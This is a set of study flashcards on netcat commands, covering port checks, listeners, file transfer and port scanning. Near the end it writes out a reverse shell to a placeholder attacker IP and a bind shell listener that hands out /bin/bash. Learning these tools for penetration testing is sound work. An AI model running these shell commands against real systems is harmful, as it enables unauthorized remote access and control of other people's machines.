netcat commands Flashcards
netcat
- network utility commonly used in penetration testing
- used for tasks such as remote access, banner grabbing, and port scanning
- small footprint makes it easily portable
- can create reverse shells and bind shells, allowing for remote command execution
nc 10.0.0.10 80
test if the remote TCP port is open (-u for UDP), in this case, port 80
nc -l 1234
set up a TCP server listening on port 1234 (-u for UDP)
The -l option in Netcat puts it into listening mode, allowing it to act as a server. In this mode, Netcat waits for incoming connections on a specified port, enabling tasks like setting up a listener for reverse shells or transferring data.
nc -k -l 1234
keep netcat listener alive after the current connection dies
The -k option in Netcat forces the listener to stay active and keep listening for new incoming connections even after a connection is closed. It is commonly used to allow multiple connections to the same port during a session.
nc 10.0.0.10 1234 < my.tgz
transfer file to remote endpoint via netcat
nc -l 1234 > my.tgz
receive and save file via netcat
nc -z 10.0.0.10 1-1000
scan a range of ports on a target (e.g. 1 to 1000)
The -z option in Netcat is used for zero-I/O mode, primarily for port scanning. It tells Netcat not to send or receive any data, focusing instead on checking whether specified ports are open on a target system.
nc -z 10.0.0.10 1-100 200-300
scan multiple ranges of ports
The -z option in Netcat is used for zero-I/O mode, primarily for port scanning. It tells Netcat not to send or receive any data, focusing instead on checking whether specified ports are open on a target system.
nc -vuz -w1 10.0.0.10 1-1000
scan a range of UDP ports with a 1-second timeout
- -v: The -v option in Netcat enables verbose mode, which provides detailed output about the actions being performed. This can include information like connection status, data being sent or received, and error messages, making it useful for troubleshooting and understanding the execution flow during network tasks
- -z: zero-I/O mode, primarily for port scanning. It tells Netcat not to send or receive any data, focusing instead on checking whether specified ports are open on a target system
- -u: send via UDP
nc <attacker-ip> 4444 -e /bin/bash
create a reverse shell on target host
The -e option in Netcat allows it to execute a specified program after a successful connection is established. This is commonly used for creating a backdoor or reverse shell by linking the remote connection to a shell program like /bin/sh on Linux or cmd.exe on Windows.
Note: This option is often considered risky and can be disabled in some versions of Netcat due to its potential for misuse in malicious activities
nc -l 4444 -e /bin/bash
create a persistent netcat listener for bind shell
- -l: The -l option in Netcat puts it into listening mode, allowing it to act as a server. In this mode, Netcat waits for incoming connections on a specified port, enabling tasks like setting up a listener for reverse shells or transferring data
- -e: The -e option in Netcat allows it to execute a specified program after a successful connection is established. This is commonly used for creating a backdoor or reverse shell by linking the remote connection to a shell program like /bin/sh on Linux or cmd.exe on Windows. Note: This option is often considered risky and can be disabled in some versions of Netcat due to its potential for misuse in malicious activities
nc -l 12345 -c 'uptime'
run a command and redirect output to client
- -l: The -l option in Netcat puts it into listening mode, allowing it to act as a server. In this mode, Netcat waits for incoming connections on a specified port, enabling tasks like setting up a listener for reverse shells or transferring data
- -c: The -c option in Netcat allows you to execute a shell command and redirect its input/output over the network connection. This can be useful for creating simple command execution functionality during penetration testing. However, like the -e option, this feature is not universally available and may be omitted in some versions of Netcat for security reasons.